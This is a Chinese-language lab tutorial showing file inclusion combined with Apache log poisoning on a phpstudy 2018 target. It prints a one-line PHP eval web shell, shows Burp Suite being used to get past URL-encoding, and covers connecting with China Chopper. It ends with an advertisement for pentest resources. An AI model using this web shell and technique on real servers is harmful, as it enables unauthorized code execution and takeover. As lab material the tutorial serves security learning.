此实验中用的是phpstudy2018
靶机IP地址:192.168.212.131

一、前提条件

phpstudy中日志功能默认关闭,得手动修改配置文件开启apache日志功能

文件包含漏洞——配合日志文件_日志文件


重启phpstudy,访问日志文件存在

文件包含漏洞——配合日志文件_php_02

二、文件包含漏洞测试

第一步:输入<?php phpinfo();?>进行测试

文件包含漏洞——配合日志文件_文件包含_03


利用文件包含漏洞查看各个输入的内容是否存在与日志文件内

文件包含漏洞——配合日志文件_文件包含_04


发现<?php phpinfo();?>已被转义成%3C?php%20phpinfo();?%3E

第二步:既然被转移,那就结合burpsuite抓包修改

开启burpsuite抓包,输入<?php phpinfo();?>继续进行测试

文件包含漏洞——配合日志文件_日志文件_05


拦包修改被转义的内容

文件包含漏洞——配合日志文件_php_06


文件包含漏洞——配合日志文件_日志文件_07


修改之后放包,再去文件包含日志文件,发现<?php phpinfo();?>已被执行

文件包含漏洞——配合日志文件_日志文件_08

三、文件包含漏洞利用

第一步:输入一句话 <?php @eval($_POST[x]);?>

文件包含漏洞——配合日志文件_日志文件_09


拦包修改被转义的内容

文件包含漏洞——配合日志文件_日志文件_10


文件包含漏洞——配合日志文件_文件包含_11


第二步:访问日志文件,查看没有一句话 内容,说明一句话 muma被当作php语言正常解析运行了

文件包含漏洞——配合日志文件_文件包含_12


第三步:中国菜刀连接muma文件

文件包含漏洞——配合日志文件_php_13


添加成功之后,双击查看,成功链接

文件包含漏洞——配合日志文件_php_14


更多资源:

1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程